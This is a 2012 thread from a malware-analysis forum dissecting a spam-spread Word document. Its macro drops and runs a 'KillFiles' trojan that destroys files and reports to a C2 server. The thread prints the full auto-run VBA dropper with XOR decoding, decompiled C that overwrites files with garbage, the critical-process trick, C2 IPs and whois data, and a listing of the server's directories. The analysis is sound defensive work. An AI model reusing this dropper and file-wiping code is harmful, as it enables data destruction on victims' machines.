A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #11978  by EP_X0FF
 Tue Mar 06, 2012 1:25 am
Description http://www.ridus.ru/news/24541/

Image

Piece of wonderful trashy code embedded in Word document. Macros (see below for complete code) drops (#USERPROFILE temp) and executes KillFiles trojan, which kill files (*.msc *.exe *.doc *.xls *.rar *.zip *.7z) on current logical disk by overwriting them with garbage. Additionally uses Pending File Operations to delete these files after reboot.
Code: Select all
  wcstombs(Dest, Source, 0x100u);
  if ( strstr(Dest, ".msc")
    || strstr(Dest, ".exe")
    || strstr(Dest, ".doc")
    || strstr(Dest, ".xls")
    || strstr(Dest, ".rar")
    || strstr(Dest, ".zip")
    || strstr(Dest, ".7z") )
  {
    SetFileAttributesW(lpFileName, 0x80u);
    hFile = CreateFileW(lpFileName, 0x40000000u, 0, 0, 3u, 0x80u, 0);
    dwBufferSize = GetFileSize(hFile, 0);
    if ( dwBufferSize >= 0x12D000 )
      dwBufferSize = 1048576;
    WriteFile(hFile, lpBuffer, dwBufferSize, &NumberOfBytesWritten, 0);
    CloseHandle(hFile);
    MoveFileExW(lpFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT);
  }
Spread via spam. After successful work calls home with report (193.104.153.31).
domain: TROPIC18854.RU
nserver: ns1.tropic18854.ru. 193.104.153.31
nserver: ns2.tropic18854.ru. 193.104.153.32
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.02.22
paid-till: 2013.02.22
free-date: 2013.03.25
source: TCI
domain: SURERO48421.RU
nserver: ns1.surero48421.ru. 193.104.153.31
nserver: ns2.surero48421.ru. 193.104.153.32
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.02.14
paid-till: 2013.02.14
free-date: 2013.03.17
source: TCI
Domains previously used for another malware, see

http://www.threatexpert.com/report.aspx ... d108609f17

To work requires macros support to be enabled in Office. Payload work with invoker access rights, autorun through HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Payload process set to be critical system process (for reboot purpose)
Code: Select all
hNtdll = LoadLibraryA("ntdll.dll");
pRtlSetProcessCritical = GetProcAddress(hNtdll, "RtlSetProcessIsCritical");
pRtlSetProcessCritical(TRUE, NULL, FALSE);
return TerminateProcess(GetCurrentProcess(), 0xDE);
Self explaining strings from exe.
autorun exe S e D e b u g P r i v i l e g e ntdll.dll RtlSetProcessIsCritical * . * . ..
\ \\?\ :\ * iemainmodulefile.tmp w h Kill successfull POST %s HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-transfer-encoding: base64
Content-Length: %d
Host: %s
Connection: Keep-Alive
id=%s&code=2&md5=wer&data=
id= code=
C:\Users\admin\Documents\projects\loader\Screen\Release\killAll_exe.pdb

Macros code
Code: Select all
Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

Declare Function CreateProcessA Lib "kernel32" (ByVal _
    lpApplicationname As String, ByVal lpCommandLine As String, ByVal _
    lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
    ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, _
    lpStartupInfo As STARTUPINFO, lpProcessInformation As _
    PROCESS_INFORMATION) As Long
Sub Auto_Open()

    ImgDel
    DecodeText
    Pkjor12

End Sub
Sub AutoOpen()

    Auto_Open

End Sub

Sub Workbook_Open()

    Auto_Open

End Sub

Sub Pkjor12()

    Dim Pkjor7 As Integer

    Dim Pkjor1 As String

    Dim Pkjor2 As String

    Dim Pkjor3 As Integer

    Dim Pkjor4 As Paragraph

    Dim Pkjor8 As Integer

    Dim Pkjor9 As Boolean

    Dim Pkjor5 As Integer

    Dim Pkjor11 As String

    Dim Pkjor6 As Byte

    Dim Lbcybkbhom As String
    
    Lbcybkbhom = "Lbcybkbhom"
    Pkjor1 = "xX1.exe"
    Pkjor2 = Environ("USERPROFILE")
    ChDrive (Pkjor2)
    ChDir (Pkjor2)
    Pkjor3 = FreeFile()

    Open Pkjor1 For Binary As Pkjor3

    For Each Pkjor4 In ActiveDocument.Paragraphs

        DoEvents

            Pkjor11 = Pkjor4.Range.Text

        If (Pkjor9 = True) Then

            Pkjor8 = 1

            While (Pkjor8 < Len(Pkjor11))

                Pkjor6 = Mid(Pkjor11, Pkjor8, 4)

                Put #Pkjor3, , Pkjor6

                Pkjor8 = Pkjor8 + 4

            Wend

        ElseIf (InStr(1, Pkjor11, Lbcybkbhom) > 0 And Len(Pkjor11) > 0) Then

            Pkjor9 = True

        End If

    Next

    Close #Pkjor3

    Pkjor13 (Pkjor1)

End Sub

    

Sub Pkjor13(Pkjor10 As String)

    Dim Pkjor7 As Integer

    Dim Pkjor2 As String

    Pkjor2 = Environ("USERPROFILE")
    ChDrive (Pkjor2)
    ChDir (Pkjor2)
    Dim start As STARTUPINFO
    Dim proc As PROCESS_INFORMATION
    Dim ret As Long
    
    ret = CreateProcessA(Pkjor10, vbNullString, 0&, 0&, 0&, 0&, 0&, vbNullString, start, proc)


End Sub

Sub ImgDel()

For Each Image In ActiveDocument.InlineShapes
Image.Delete
Exit For
Next Image
 
End Sub

Sub DecodeText()

Dim flag As Boolean
flag = False

For Each par In ActiveDocument.Paragraphs

    If flag = True Then
            flag = False
        Else
            par.Range.Text = XorEncDec(par.Range.Text)
            flag = True
    End If

 Next par
  
End Sub

Function XorEncDec(inData As String)
Dim outData As String, Counter As Long
Dim Temp As Integer

Counter = 1
Do Until Counter = (Len(inData) + 1)
        Temp = Asc(Mid(inData, Counter, 1))
        Temp = Temp Xor 10
        outData = outData & Chr$(Temp)
        Counter = Counter + 1
Loop
XorEncDec = outData + Chr(10)
End Function
Both - doc and exe payload in attach.
Attachments
pass: malware
(327.41 KiB) Downloaded 82 times
 #11988  by Xylitol
 Tue Mar 06, 2012 9:33 am
PFN_LIST_CORRUPT BSoD
Image
Image
missing file yay

multiple Smoke Loader on 193.104.153.31 (xaker.name/forvb/showthread.php?t=22008&page=2 - this also interesting: damagelab.org/index.php?showtopic=22364)

Image
Code: Select all
193.104.153.31/icons/
193.104.153.31/back/
193.104.153.31/ftp/
193.104.153.31/ftp/include/
193.104.153.31/ftp/tmp/
193.104.153.31/fl/
193.104.153.31/aaa/
193.104.153.31/aaa/data/ - 403
193.104.153.31/aaa/mods/ - 403
193.104.153.31/aaa/inc/ - 403
193.104.153.31/aaa/exe/ - 403
193.104.153.31/aaa/imgs/
193.104.153.31/aaa/imgs/flags/uk.gif
193.104.153.31/aaa/imgs/header.png - Smoke loader !
193.104.153.31/aaa/imgs/footer.png
193.104.153.31/aaa/control.php
193.104.153.31/aaa/guest.php
193.104.153.31/sss/
193.104.153.31/mmm/
193.104.153.31/disabled/
193.104.153.31/ttt/
193.104.153.31/rcm/
193.104.153.31/hhh/
193.104.153.31/webstat/ - 401
193.104.153.31/manager/ - panel
Image

Sandbox result for the killbot
http://camas.comodo.com/cgi-bin/submit? ... 53bcd7b327
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.threatexpert.com/report.aspx ... eb68385933
http://malwr.com/analysis/7417926555250 ... b68385933/
VT (10/43): https://www.virustotal.com/file/658504b ... /analysis/

edit: 193.104.153.31 - could not connect, look's like it's shutdown (they read this forum? lol)